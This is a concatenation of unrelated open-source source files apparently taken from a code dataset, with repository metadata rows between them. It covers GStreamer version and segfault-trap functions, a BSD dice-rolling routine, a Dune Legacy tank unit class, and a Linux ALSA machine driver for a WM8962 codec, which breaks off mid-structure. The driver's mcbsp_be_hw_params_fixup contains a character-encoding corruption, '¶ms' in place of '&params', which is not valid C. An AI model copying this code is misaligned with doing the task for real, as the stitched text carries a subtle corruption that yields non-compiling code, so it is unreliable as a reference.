  g_type_class_unref (g_type_class_peek (gst_pad_probe_return_get_type ()));
  g_type_class_unref (g_type_class_peek (gst_segment_flags_get_type ()));
  g_type_class_unref (g_type_class_peek (gst_scheduling_flags_get_type ()));
  g_type_class_unref (g_type_class_peek (gst_control_binding_get_type ()));
  g_type_class_unref (g_type_class_peek (gst_control_source_get_type ()));
  g_type_class_unref (g_type_class_peek (gst_toc_entry_type_get_type ()));
  g_type_class_unref (g_type_class_peek (gst_toc_loop_type_get_type ()));
  g_type_class_unref (g_type_class_peek (gst_lock_flags_get_type ()));
  g_type_class_unref (g_type_class_peek (gst_allocator_flags_get_type ()));
  g_type_class_unref (g_type_class_peek (gst_stream_flags_get_type ()));
  g_type_class_unref (g_type_class_peek (gst_debug_color_mode_get_type ()));

  gst_deinitialized = TRUE;
  GST_INFO ("deinitialized GStreamer");
}
/**
* gst_version:
* @major: (out): pointer to a guint to store the major version number
* @minor: (out): pointer to a guint to store the minor version number
* @micro: (out): pointer to a guint to store the micro version number
* @nano: (out): pointer to a guint to store the nano version number
*
* Gets the version number of the GStreamer library.
*/
void
gst_version (guint * major, guint * minor, guint * micro, guint * nano)
{
  /* all four out-parameters are mandatory */
  g_return_if_fail (major != NULL);
  g_return_if_fail (minor != NULL);
  g_return_if_fail (micro != NULL);
  g_return_if_fail (nano != NULL);

  /* report the compile-time version of this library build */
  *major = GST_VERSION_MAJOR;
  *minor = GST_VERSION_MINOR;
  *micro = GST_VERSION_MICRO;
  *nano = GST_VERSION_NANO;
}
/**
* gst_version_string:
*
* This function returns a string that is useful for describing this version
* of GStreamer to the outside world: user agent strings, logging, ...
*
* Returns: (transfer full): a newly allocated string describing this version
* of GStreamer.
*/
gchar *
gst_version_string (void)
{
  guint major, minor, micro, nano;

  /* Fixed: the previous revision contained the mojibake token `µ' here in
   * place of `&micro' (an HTML-entity corruption), which is not valid C. */
  gst_version (&major, &minor, &micro, &nano);

  /* nano encodes the flavour: 0 = release, 1 = git/development build,
   * anything else = prerelease */
  if (nano == 0)
    return g_strdup_printf ("GStreamer %d.%d.%d", major, minor, micro);
  else if (nano == 1)
    return g_strdup_printf ("GStreamer %d.%d.%d (GIT)", major, minor, micro);
  else
    return g_strdup_printf ("GStreamer %d.%d.%d (prerelease)", major, minor,
        micro);
}
/**
* gst_segtrap_is_enabled:
*
* Some functions in the GStreamer core might install a custom SIGSEGV handler
* to better catch and report errors to the application. Currently this feature
* is enabled by default when loading plugins.
*
* Applications might want to disable this behaviour with the
* gst_segtrap_set_enabled() function. This is typically done if the application
* wants to install its own handler without GStreamer interfering.
*
* Returns: %TRUE if GStreamer is allowed to install a custom SIGSEGV handler.
*/
gboolean
gst_segtrap_is_enabled (void)
{
/* yeps, it's enabled when it's not disabled */
return !_gst_disable_segtrap;
}
/**
* gst_segtrap_set_enabled:
* @enabled: whether a custom SIGSEGV handler should be installed.
*
* Applications might want to disable/enable the SIGSEGV handling of
* the GStreamer core. See gst_segtrap_is_enabled() for more information.
*/
void
gst_segtrap_set_enabled (gboolean enabled)
{
  /* the internal flag stores the inverse ("disable") sense */
  _gst_disable_segtrap = enabled ? FALSE : TRUE;
}
| gpl-2.0 |
lyn1337/LinuxDSc2 | user/games/bsdgames/mille/roll.c | 2 | 2103 | /* $NetBSD: roll.c,v 1.7 2003/08/07 09:37:26 agc Exp $ */
/*
* Copyright (c) 1982, 1993
* The Regents of the University of California. All rights reserved.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions
* are met:
* 1. Redistributions of source code must retain the above copyright
* notice, this list of conditions and the following disclaimer.
* 2. Redistributions in binary form must reproduce the above copyright
* notice, this list of conditions and the following disclaimer in the
* documentation and/or other materials provided with the distribution.
* 3. Neither the name of the University nor the names of its contributors
* may be used to endorse or promote products derived from this software
* without specific prior written permission.
*
* THIS SOFTWARE IS PROVIDED BY THE REGENTS AND CONTRIBUTORS ``AS IS'' AND
* ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
* IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
* ARE DISCLAIMED. IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE LIABLE
* FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
* DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
* OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
* HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
* LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
* OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
* SUCH DAMAGE.
*/
#include <sys/cdefs.h>
#ifndef lint
#if 0
static char sccsid[] = "@(#)roll.c 8.1 (Berkeley) 5/31/93";
#else
__RCSID("$NetBSD: roll.c,v 1.7 2003/08/07 09:37:26 agc Exp $");
#endif
#endif /* not lint */
# include "mille.h"
/*
* This routine rolls ndie nside-sided dice.
*
* @(#)roll.c 1.1 (Berkeley) 4/1/82
*
*/
/*
 * Roll `ndie` dice of `nsides` faces each and return the summed total.
 * Each die contributes a value in [1, nsides] drawn from random().
 */
int
roll(int ndie, int nsides)
{
	int total = 0;
	int i;

	for (i = 0; i < ndie; i++)
		total += random() % nsides + 1;
	return total;
}
| gpl-2.0 |
binarycrusader/dunelegacy | src/units/Tank.cpp | 2 | 2991 | /*
* This file is part of Dune Legacy.
*
* Dune Legacy is free software: you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation, either version 2 of the License, or
* (at your option) any later version.
*
* Dune Legacy is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with Dune Legacy. If not, see <http://www.gnu.org/licenses/>.
*/
#include <units/Tank.h>
#include <globals.h>
#include <FileClasses/GFXManager.h>
#include <House.h>
#include <Game.h>
#include <Map.h>
#include <Explosion.h>
#include <ScreenBorder.h>
#include <SoundPlayer.h>
// Construct a fresh tank owned by the given house, starting at full health.
Tank::Tank(House* newOwner) : TankBase(newOwner) {
    Tank::init();
    setHealth(getMaxHealth());
}
// Deserializing constructor: TankBase restores the saved state from the
// stream; init() rebuilds the non-serialized members (graphics, counters).
Tank::Tank(InputStream& stream) : TankBase(stream) {
    Tank::init();
}
// Shared constructor helper: registers the unit with its owner and
// resolves the hull and turret sprites for the owner's house.
void Tank::init() {
    itemID = Unit_Tank;
    owner->incrementUnits(itemID);   // owner keeps per-item-type unit counts

    numWeapons = 1;
    bulletType = Bullet_ShellMedium;

    // Hull sprite, colored for the owning house.
    graphicID = ObjPic_Tank_Base;
    graphic = pGFXManager->getObjPic(graphicID,getOwner()->getHouseID());
    // Turret sprite, drawn on top of the hull in blitToScreen().
    gunGraphicID = ObjPic_Tank_Gun;
    turretGraphic = pGFXManager->getObjPic(gunGraphicID,getOwner()->getHouseID());

    numImagesX = NUM_ANGLES;   // one frame per facing direction
    numImagesY = 1;
}
// Nothing Tank-specific to release; TankBase's destructor does the cleanup.
Tank::~Tank() {
}
void Tank::blitToScreen() {
SDL_Surface* pUnitGraphic = graphic[currentZoomlevel];
int imageW1 = pUnitGraphic->w/numImagesX;
int x = screenborder->world2screenX(realX);
int y = screenborder->world2screenY(realY);
SDL_Rect source1 = { drawnAngle * imageW1, 0, imageW1, pUnitGraphic->h };
SDL_Rect dest1 = { x - imageW1/2, y - pUnitGraphic->h/2, imageW1, pUnitGraphic->h };
SDL_BlitSurface(pUnitGraphic, &source1, screen, &dest1);
SDL_Surface* pTurretGraphic = turretGraphic[currentZoomlevel];
int imageW2 = pTurretGraphic->w/NUM_ANGLES;
SDL_Rect source2 = { drawnTurretAngle * imageW2, 0, imageW2, pTurretGraphic->h };
SDL_Rect dest2 = { x - imageW2/2, y - pTurretGraphic->h/2, imageW2, pTurretGraphic->h };
SDL_BlitSurface(pTurretGraphic, &source2, screen, &dest2);
if(isBadlyDamaged()) {
drawSmoke(x, y);
}
}
// Destroy the tank: spawn a random medium explosion (with sound if the
// owner's team can see it) when the wreck is on-map and visible, then
// delegate the actual removal to TankBase.
void Tank::destroy() {
    if(currentGameMap->tileExists(location) && isVisible()) {
        Coord position(lround(realX), lround(realY));
        Uint32 explosionID = currentGame->randomGen.getRandOf(3,Explosion_Medium1, Explosion_Medium2,Explosion_Flames);
        currentGame->getExplosionList().push_back(new Explosion(explosionID, position, owner->getHouseID()));

        if(isVisible(getOwner()->getTeam())) {
            soundPlayer->playSoundAt(Sound_ExplosionMedium,location);
        }
    }

    TankBase::destroy();
}
// Audible feedback when the tank fires, positioned at the unit's tile.
void Tank::playAttackSound() {
    soundPlayer->playSoundAt(Sound_ExplosionSmall,location);
}
| gpl-2.0 |
ChameleonOS/android_kernel_amazon_bowser-common | sound/soc/omap/bowser.c | 2 | 16415 | /*
* bowser.c -- SoC audio for TI OMAP4430 SDP
*
* Author: Misael Lopez Cruz <x0052729@ti.com>
*
* This program is free software; you can redistribute it and/or
* modify it under the terms of the GNU General Public License
* version 2 as published by the Free Software Foundation.
*
* This program is distributed in the hope that it will be useful, but
* WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
* General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program; if not, write to the Free Software
* Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA
* 02110-1301 USA
*
*/
#include <linux/clk.h>
#include <linux/platform_device.h>
#include <linux/i2c.h>
#include <linux/i2c/twl.h>
#include <linux/regulator/consumer.h>
#include <linux/delay.h>
#include <sound/core.h>
#include <sound/pcm.h>
#include <sound/pcm_params.h>
#include <sound/soc.h>
#include <sound/soc-dapm.h>
#include <sound/jack.h>
#include <sound/soc-dsp.h>
#include <asm/mach-types.h>
#include <plat/hardware.h>
#include <plat/mux.h>
#include <plat/mcbsp.h>
#include "omap-mcpdm.h"
#include "omap-abe.h"
#include "omap-pcm.h"
#include "omap-mcbsp.h"
#include "omap-dmic.h"
#include "../codecs/wm8962.h"
#ifdef CONFIG_SND_OMAP_SOC_HDMI
#include "omap-hdmi.h"
#endif
#include "abe/abe_main.h"
#define ALSA_DEBUG
#include "bowser_alsa_debug.h"
/* External master clock fed to the WM8962 (auxclk0_ck, 19.2 MHz). */
#define WM8962_MCLK_RATE	19200000

/* Codec system clock: 512 x frame rate, following the ABE base rate. */
#ifdef CONFIG_ABE_44100
#define WM8962_SYS_CLK_RATE	(44100 * 512)
#else
#define WM8962_SYS_CLK_RATE	(48000 * 512)
#endif

/* static struct regulator *av_switch_reg; */
static struct clk *wm8962_mclk;		/* MCLK source, obtained in bowser_soc_init() */
static unsigned int fll_clk = WM8962_SYS_CLK_RATE;	/* FLL output rate */
static unsigned int sys_clk = WM8962_SYS_CLK_RATE;	/* codec SYSCLK rate */
/* codec DAI, published by bowser_wm8962_init(); NULL until the card probes */
static struct snd_soc_dai *codec_dai;
/* last bias level seen by the card-level bias hooks */
static enum snd_soc_bias_level bias_level = SND_SOC_BIAS_OFF;
static struct snd_soc_jack bowser_jack;	/* headset jack ("h2w") */
/*
 * Card bias-level hook, invoked before the codec's own bias handling.
 *
 * OFF -> STANDBY: gate the external MCLK on so the WM8962 has a clock
 * before it powers up.  STANDBY -> PREPARE: start the codec FLL from
 * MCLK and switch SYSCLK over to the FLL output.
 *
 * Returns 0 on success or a negative errno from the clock/DAI calls.
 */
static int bowser_set_bias_level(struct snd_soc_card *card,
				 struct snd_soc_dapm_context *dapm,
				 enum snd_soc_bias_level level)
{
	int ret;

	/* codec_dai is a file-scope pointer set in bowser_wm8962_init();
	 * guard the pointer itself before dereferencing it, not just ->dev
	 * (the original dereferenced a possibly-NULL codec_dai here). */
	if (codec_dai == NULL || codec_dai->dev == NULL) {
		pr_err("no run time codec_dai initialized yet\n");
		return -EINVAL;
	}

	dev_dbg(codec_dai->dev, "Setting bias %d\n", level);

	/* only act on the codec's own DAPM context */
	if (dapm->dev != codec_dai->dev) {
		dev_dbg(dapm->dev,"dapm->dev!=codec_dai->dev\n");
		return 0;
	}

	switch (level) {
	case SND_SOC_BIAS_STANDBY:
		if (bias_level == SND_SOC_BIAS_OFF) {
			ret = clk_enable(wm8962_mclk);
			if (ret < 0) {
				dev_err(codec_dai->dev,
					"Failed to enable MCLK: %d\n", ret);
				return ret;
			}
		}
		break;
	case SND_SOC_BIAS_PREPARE:
		if (bias_level == SND_SOC_BIAS_STANDBY) {
			/* FLL must be running before SYSCLK is re-parented */
			ret = snd_soc_dai_set_pll(codec_dai, WM8962_FLL,
						  WM8962_FLL_MCLK,
						  WM8962_MCLK_RATE,
						  fll_clk);
			if (ret < 0) {
				dev_err(codec_dai->dev,
					"Failed to start CODEC FLL: %d\n",
					ret);
				return ret;
			}

			ret = snd_soc_dai_set_sysclk(codec_dai,
						     WM8962_SYSCLK_FLL,
						     sys_clk, 0);
			if (ret < 0) {
				dev_err(codec_dai->dev,
					"Failed to set CODEC SYSCLK: %d\n",
					ret);
				return ret;
			}
		}
		break;
	default:
		break;
	}

	return 0;
}
/*
 * Card bias-level hook, invoked after the codec's own bias handling.
 *
 * PREPARE -> STANDBY: move SYSCLK back to raw MCLK and stop the FLL.
 * Any -> OFF: gate the MCLK off again.  Records the new level in the
 * file-scope bias_level so the pre-hook can detect transitions.
 */
static int bowser_set_bias_level_post(struct snd_soc_card *card,
				      struct snd_soc_dapm_context *dapm,
				      enum snd_soc_bias_level level)
{
	int ret;

	/* guard the pointer itself before dereferencing it (the original
	 * dereferenced a possibly-NULL codec_dai here) */
	if (codec_dai == NULL || codec_dai->dev == NULL) {
		pr_err("no run time codec_dai initialized yet\n");
		return -EINVAL;
	}

	dev_dbg(codec_dai->dev, "Setting bias post %d\n", level);

	/* only act on the codec's own DAPM context */
	if (dapm->dev != codec_dai->dev) {
		dev_dbg(dapm->dev,"dapm->dev!=codec_dai->dev\n");
		return 0;
	}

	switch (level) {
	case SND_SOC_BIAS_STANDBY:
		if (bias_level == SND_SOC_BIAS_PREPARE) {
			/* re-parent SYSCLK to MCLK before the FLL stops */
			ret = snd_soc_dai_set_sysclk(codec_dai,
						     WM8962_SYSCLK_MCLK,
						     sys_clk, 0);
			if (ret < 0) {
				dev_err(codec_dai->dev,
					"Failed to set CODEC SYSCLK: %d\n",
					ret);
				return ret;
			}

			ret = snd_soc_dai_set_pll(codec_dai, WM8962_FLL,
						  WM8962_FLL_MCLK, 0, 0);
			if (ret < 0) {
				dev_err(codec_dai->dev,
					"Failed to stop CODEC FLL: %d\n", ret);
				return ret;
			}
		}
		break;
	case SND_SOC_BIAS_OFF:
		clk_disable(wm8962_mclk);
		break;
	default:
		break;
	}

	bias_level = level;

	return 0;
}
/*
 * Pre-suspend hook: force the codec's SYSCLK and MICBIAS DAPM pins off so
 * the WM8962 is quiescent before the platform suspends.
 */
static int bowser_suspend_pre(struct snd_soc_card *card)
{
	/* Guard BEFORE any dereference: the original logged through
	 * codec_dai->dev (and passed the NULL dev to dev_err) before
	 * performing this check. */
	if (codec_dai == NULL || codec_dai->dev == NULL) {
		pr_err("no run time codec_dai initialized yet\n");
		return -EINVAL;
	}

	dev_crit(codec_dai->dev,"%s\n",__func__);

	snd_soc_dapm_disable_pin(&codec_dai->codec->dapm, "SYSCLK");
	snd_soc_dapm_sync(&codec_dai->codec->dapm);
	/* short pause between the two DAPM syncs — presumably to let the
	 * clock change settle before cutting MICBIAS; TODO confirm */
	msleep(10);
	snd_soc_dapm_disable_pin(&codec_dai->codec->dapm, "MICBIAS");
	snd_soc_dapm_sync(&codec_dai->codec->dapm);

	return 0;
}
static int bowser_resume_post(struct snd_soc_card *card)
{
int ret=0;
dev_dbg(codec_dai->dev,"%s is calling mic_detect\n", __func__);
ret = wm8962_mic_detect(codec_dai->codec, &bowser_jack);
return ret;
}
/*
 * hw_params for the WM8962 links: pick the FLL/SYSCLK rates for the
 * requested stream rate, start the FLL from MCLK, and put both codec and
 * CPU DAIs into DSP-B format with the codec as clock/frame master.
 *
 * Note: the local codec_dai deliberately shadows the file-scope pointer;
 * both refer to the same DAI once the card has probed.
 *
 * Returns 0 on success or a negative errno from the DAI calls.
 */
static int bowser_wm8962_hw_params(struct snd_pcm_substream *substream,
	struct snd_pcm_hw_params *params)
{
	struct snd_soc_pcm_runtime *rtd = substream->private_data;
	struct snd_soc_dai *cpu_dai = rtd->cpu_dai;
	struct snd_soc_dai *codec_dai = rtd->codec_dai;
	int ret;

	dev_dbg(codec_dai->dev, "%s() - enter\n", __func__);

#ifdef CONFIG_MACH_OMAP4_BOWSER_SUBTYPE_JEM_FTM
	/* factory-test build: derive the clocks from the actual stream
	 * rate; double the FLL target if it would fall below 6 MHz */
	sys_clk = fll_clk = params_rate(params) * 512;
	if (fll_clk < 6000000)
		fll_clk *= 2;
	ret = snd_soc_dai_set_sysclk(codec_dai, WM8962_SYSCLK_MCLK,
				     WM8962_MCLK_RATE, SND_SOC_CLOCK_IN);
	if (ret < 0) {
		dev_err(codec_dai->dev, "Failed to set CODEC SYSCLK: %d\n",
			ret);
		return ret;
	}
#else
	/* production build: fixed 512*fs system clock */
	sys_clk = fll_clk = WM8962_SYS_CLK_RATE;
#endif

	/* start the FLL from MCLK, then clock the codec from the FLL */
	ret = snd_soc_dai_set_pll(codec_dai, WM8962_FLL, WM8962_FLL_MCLK,
				  WM8962_MCLK_RATE, fll_clk);
	if (ret < 0) {
		dev_err(codec_dai->dev, "Failed to start CODEC FLL: %d\n",
			ret);
		return ret;
	}

	ret = snd_soc_dai_set_sysclk(codec_dai, WM8962_SYSCLK_FLL,
				     sys_clk, 0);
	if (ret < 0) {
		dev_err(codec_dai->dev, "Failed to set CODEC SYSCLK: %d\n",
			ret);
		return ret;
	}

	/* DSP-B, codec is bit-clock and frame master, normal polarity */
	ret = snd_soc_dai_set_fmt(codec_dai, SND_SOC_DAIFMT_DSP_B |
				  SND_SOC_DAIFMT_CBM_CFM |
				  SND_SOC_DAIFMT_NB_NF);
	if (ret < 0) {
		dev_err(codec_dai->dev, "Failed to set CODEC DAI format: %d\n",
			ret);
		return ret;
	}

	/* matching format on the CPU side (McBSP as slave) */
	ret = snd_soc_dai_set_fmt(cpu_dai, SND_SOC_DAIFMT_DSP_B |
				  SND_SOC_DAIFMT_CBM_CFM |
				  SND_SOC_DAIFMT_NB_NF);
	if (ret < 0) {
		dev_err(cpu_dai->dev, "Failed to set CPU DAI format: %d\n",
			ret);
		return ret;
	}

	dev_dbg(codec_dai->dev, "%s() - exit\n", __func__);

	return 0;
}
/*
 * Stream startup: turn the external MCLK on for the duration of the
 * stream.  (Currently not wired into bowser_abe_ops — kept for the
 * commented-out .startup hook.)
 *
 * Returns 0 on success or the clk_enable() error (the original silently
 * ignored a clk_enable() failure).
 */
static int bowser_abe_wm8962_startup(struct snd_pcm_substream *substream)
{
	struct snd_soc_pcm_runtime *rtd = substream->private_data;
	struct snd_soc_dai *codec_dai = rtd->codec_dai;
	int ret = 0;

	dev_dbg(codec_dai->dev, "%s() - enter\n", __func__);

	if (wm8962_mclk != NULL) {
		ret = clk_enable(wm8962_mclk);
		if (ret < 0)
			dev_err(codec_dai->dev,
				"Failed to enable MCLK: %d\n", ret);
	}

	dev_dbg(codec_dai->dev, "%s() - exit\n", __func__);

	return ret;
}
/*
 * Stream shutdown: drop the MCLK enable taken in
 * bowser_abe_wm8962_startup().  (Also currently unused in bowser_abe_ops.)
 */
static void bowser_abe_wm8962_shutdown(struct snd_pcm_substream *substream)
{
	struct snd_soc_pcm_runtime *rtd = substream->private_data;
	struct snd_soc_dai *codec_dai = rtd->codec_dai;

	dev_dbg(codec_dai->dev, "%s() - enter\n", __func__);

	if (wm8962_mclk != NULL)
		clk_disable(wm8962_mclk);

	dev_dbg(codec_dai->dev, "%s() - exit\n", __func__);
}
/* ops for the WM8962-facing links; only hw_params is active, the
 * startup/shutdown MCLK gating hooks are deliberately left commented. */
static struct snd_soc_ops bowser_abe_ops = {
/*	.startup = bowser_abe_wm8962_startup,
	.shutdown = bowser_abe_wm8962_shutdown,*/ /*may need them for extra stuffs TI wants*/
	.hw_params = bowser_wm8962_hw_params,
};
/*
 * hw_params for the Bluetooth SCO McBSP link: DSP-C format, McBSP as
 * clock/frame slave, then set a TX threshold of one word.
 *
 * Returns 0 on success or the snd_soc_dai_set_fmt() error.
 */
static int bowser_mcbsp_hw_params(struct snd_pcm_substream *substream,
				  struct snd_pcm_hw_params *params)
{
	struct snd_soc_pcm_runtime *rtd = substream->private_data;
	struct snd_soc_dai *cpu_dai = rtd->cpu_dai;
	int ret;

	/* (removed unused locals "be_id, channels" from the original) */
	ret = snd_soc_dai_set_fmt(cpu_dai,
				  SND_SOC_DAIFMT_DSP_C |
				  SND_SOC_DAIFMT_NB_NF |
				  SND_SOC_DAIFMT_CBM_CFM);
	if (ret < 0) {
		printk(KERN_ERR "can't set cpu DAI configuration\n");
		return ret;
	}

	omap_mcbsp_set_tx_threshold(cpu_dai->id, 1);

	return ret;
}
/* ops for the Bluetooth SCO McBSP links */
static struct snd_soc_ops bowser_mcbsp_ops = {
	.hw_params = bowser_mcbsp_hw_params,
};
/* Board-level output widgets: headphone and speaker. */
static const struct snd_soc_dapm_widget bowser_dapm_widgets[] = {
	SND_SOC_DAPM_HP("HP", NULL),
	SND_SOC_DAPM_SPK("SPK", NULL),
};

/* Pin switches exposed to userspace as ALSA mixer controls. */
static const struct snd_kcontrol_new bowser_controls[] = {
	SOC_DAPM_PIN_SWITCH("DMICDAT"),
	SOC_DAPM_PIN_SWITCH("HP"),
	SOC_DAPM_PIN_SWITCH("SPK"),
};

/* Routes from the WM8962 output pins to the board widgets. */
static const struct snd_soc_dapm_route bowser_dapm_routes[] = {
	{ "HP", NULL, "HPOUTL" },
	{ "HP", NULL, "HPOUTR" },
	{ "SPK", NULL, "SPKOUTL" },
	{ "SPK", NULL, "SPKOUTR" },
};
/*
 * One-time codec setup, run when the "wm8962-noabe" link probes:
 * registers the board widgets/routes/controls, creates the headset jack
 * and hands it to the WM8962 driver for detection.  Also publishes
 * rtd->codec_dai in the file-scope codec_dai used by the card hooks.
 *
 * Returns 0 on success; widget/route/control failures are only logged,
 * jack failures are fatal.
 */
static int bowser_wm8962_init(struct snd_soc_pcm_runtime *rtd)
{
	struct snd_soc_codec *codec = rtd->codec;
	struct snd_soc_dapm_context *dapm = &codec->dapm;
	int ret;

	codec_dai = rtd->codec_dai;

	ret = snd_soc_dapm_new_controls(dapm, bowser_dapm_widgets,
					ARRAY_SIZE(bowser_dapm_widgets));
	if (ret < 0)
		pr_err("Failed to register DAPM widgets for Bowser\n");

	ret = snd_soc_dapm_add_routes(dapm, bowser_dapm_routes,
				      ARRAY_SIZE(bowser_dapm_routes));
	if (ret < 0)
		pr_err("Failed to register DAPM routes for Bowser\n");

	ret = snd_soc_add_controls(codec, bowser_controls,
				   ARRAY_SIZE(bowser_controls));
	if (ret < 0)
		pr_err("Failed to add Bowser controls\n");

	/* "h2w" jack name — looks like the Android headset-observer
	 * convention; confirm against the userspace consumer */
	ret = snd_soc_jack_new(codec, "h2w",
			       SND_JACK_HEADSET | SND_JACK_HEADPHONE,
			       &bowser_jack);
	if (ret) {
		pr_err("Failed to create jack: %d\n", ret);
		return ret;
	}

	/* headset button 0 reports as KEY_MEDIA */
	snd_jack_set_key(bowser_jack.jack, SND_JACK_BTN_0, KEY_MEDIA);

	ret = wm8962_get_jack(codec, &bowser_jack);
	if (ret) {
		pr_err("Failed to get jack: %d\n", ret);
		return ret;
	}

	return 0;
}
static int mcbsp_be_hw_params_fixup(struct snd_soc_pcm_runtime *rtd,
struct snd_pcm_hw_params *params)
{
struct snd_soc_dai *cpu_dai = rtd->cpu_dai;
struct snd_interval *channels = hw_param_interval(params,
SNDRV_PCM_HW_PARAM_CHANNELS);
unsigned int be_id = rtd->dai_link->be_id;
unsigned int threshold;
switch (be_id) {
case OMAP_ABE_DAI_MM_FM:
channels->min = 2;
threshold = 2;
break;
case OMAP_ABE_DAI_BT_VX:
channels->min = 1;
threshold = 1;
break;
default:
threshold = 1;
break;
}
snd_mask_set(¶ms->masks[SNDRV_PCM_HW_PARAM_FORMAT -
SNDRV_PCM_HW_PARAM_FIRST_MASK],
SNDRV_PCM_FORMAT_S16_LE);
omap_mcbsp_set_tx_threshold(cpu_dai->id, threshold);
omap_mcbsp_set_rx_threshold(cpu_dai->id, threshold);
return 0;
}
/* Stand-in DAI describing the Bluetooth SCO interface: 8 kHz mono S16_LE
 * in both directions (the BT chip has no codec driver of its own). */
static struct snd_soc_dai_driver bt_dai[] = {
{
	.name = "Bluetooth",
	.playback = {
		.stream_name = "BT Playback",
		.channels_min = 1,
		.channels_max = 1,
		.rates = SNDRV_PCM_RATE_8000,
		.formats = SNDRV_PCM_FMTBIT_S16_LE,
	},
	.capture = {
		.stream_name = "BT Capture",
		.channels_min = 1,
		.channels_max = 1,
		.rates = SNDRV_PCM_RATE_8000,
		.formats = SNDRV_PCM_FMTBIT_S16_LE,
	},
}
};
/* Front-end DSP link descriptors (bespoke triggering in both directions). */

/* low-power, playback-only front end (used by "wm8962-lp") */
struct snd_soc_dsp_link fe_lp_media = {
	.playback = true,
	.trigger =
		{SND_SOC_DSP_TRIGGER_BESPOKE, SND_SOC_DSP_TRIGGER_BESPOKE},
};

/* full-duplex multimedia front end (used by "wm8962") */
struct snd_soc_dsp_link fe_media = {
	.playback = true,
	.capture = true,
	.trigger =
		{SND_SOC_DSP_TRIGGER_BESPOKE, SND_SOC_DSP_TRIGGER_BESPOKE},
};

/* capture-only front end (used by "wm8962-mm-ul2") */
struct snd_soc_dsp_link fe_media_capture = {
	.capture = true,
	.trigger =
		{SND_SOC_DSP_TRIGGER_BESPOKE, SND_SOC_DSP_TRIGGER_BESPOKE},
};
/* Digital audio interface glue - connects codec <--> CPU */
/* Digital audio interface glue - connects codec <--> CPU */
static struct snd_soc_dai_link bowser_dai[] = {

	/* ---- front ends: visible to userspace as PCM devices ---- */
	{
		.name = "wm8962-lp",
		.stream_name = "Multimedia",

		/* ABE components - MM-DL (mmap) */
		.cpu_dai_name = "MultiMedia1 LP",
		.platform_name = "aess",

		.dynamic = 1, /* BE is dynamic */
		.dsp_link = &fe_lp_media,
	},
	{
		.name = "wm8962",
		.stream_name = "Multimedia",

		/* ABE components - MM-UL & MM_DL */
		.cpu_dai_name = "MultiMedia1",
		.platform_name = "omap-pcm-audio",

		.dynamic = 1, /* BE is dynamic */
		.dsp_link = &fe_media,
	},
	{
		/* direct (non-ABE) path to the codec over McBSP2; its
		 * .init publishes codec_dai for the card hooks */
		.name = "wm8962-noabe",
		.stream_name = "wm8962",

		.cpu_dai_name = "omap-mcbsp-dai.1", /* McBSP2 */
		.platform_name = "omap-pcm-audio",
		.codec_dai_name = "wm8962",
		.codec_name = "wm8962.3-001a",
		.ops = &bowser_abe_ops,
		.init = &bowser_wm8962_init,
	},
	{
		.name = "wm8962-mm-ul2",
		.stream_name = "Multimedia Capture",

		/* ABE components - MM-UL2 */
		.cpu_dai_name = "MultiMedia2",
		.platform_name = "omap-pcm-audio",

		.dynamic = 1, /* BE is dynamic */
		.dsp_link = &fe_media_capture,
	},
	{
		.name = "BT Playback",
		.stream_name = "Bluetooth Playback",

		/* MCBSP3 ->BT SCO */
		.cpu_dai_name = "omap-mcbsp-dai.2",
		.platform_name = "omap-pcm-audio",

		/* Bluetooth */
		.codec_dai_name = "Bluetooth",
		.no_codec = 1, /* TODO: have a dummy CODEC */
		.ops = &bowser_mcbsp_ops,
	},
	{
		.name = "BT Capture",
		.stream_name = "Bluetooth Capture",

		/* MCBSP3 <-BT SCO */
		.cpu_dai_name = "omap-mcbsp-dai.2",
		.platform_name = "omap-pcm-audio",

		/* Bluetooth */
		.codec_dai_name = "Bluetooth",
		.no_codec = 1, /* TODO: have a dummy CODEC */
		.ops = &bowser_mcbsp_ops,
	},

/*
 * Backend DAIs - i.e. dynamically matched interfaces, invisible to userspace.
 * Matched to above interfaces at runtime, based upon use case.
 */
	{
		.name = OMAP_ABE_BE_MM_EXT0_DL,
		.stream_name = "PCM Playback",

		/* ABE components - MCBSP2 - MM-EXT */
		.cpu_dai_name = "omap-mcbsp-dai.1",
		.platform_name = "aess",

		/* FM */
		.codec_dai_name = "wm8962",
		.codec_name = "wm8962.3-001a",

		.no_pcm = 1, /* don't create ALSA pcm for this */
		.be_hw_params_fixup = mcbsp_be_hw_params_fixup,
		.ops = &bowser_abe_ops,
		.be_id = OMAP_ABE_DAI_MM_FM,
	},
	{
		.name = OMAP_ABE_BE_MM_EXT0_UL,
		.stream_name = "PCM Capture",

		/* ABE components - MCBSP2 - MM-EXT */
		.cpu_dai_name = "omap-mcbsp-dai.1",
		.platform_name = "aess",

		/* FM */
		.codec_dai_name = "wm8962",
		.codec_name = "wm8962.3-001a",

		.no_pcm = 1, /* don't create ALSA pcm for this */
		.be_hw_params_fixup = mcbsp_be_hw_params_fixup,
		.ops = &bowser_abe_ops,
		.be_id = OMAP_ABE_DAI_MM_FM,
	},
};
/* Audio machine driver */
static struct snd_soc_card snd_soc_bowser = {
	.name = "bowser",
	.long_name = "TI OMAP4 bowser Board",
	.dai_link = bowser_dai,
	.num_links = ARRAY_SIZE(bowser_dai),
	.set_bias_level = bowser_set_bias_level,
	.set_bias_level_post = bowser_set_bias_level_post,
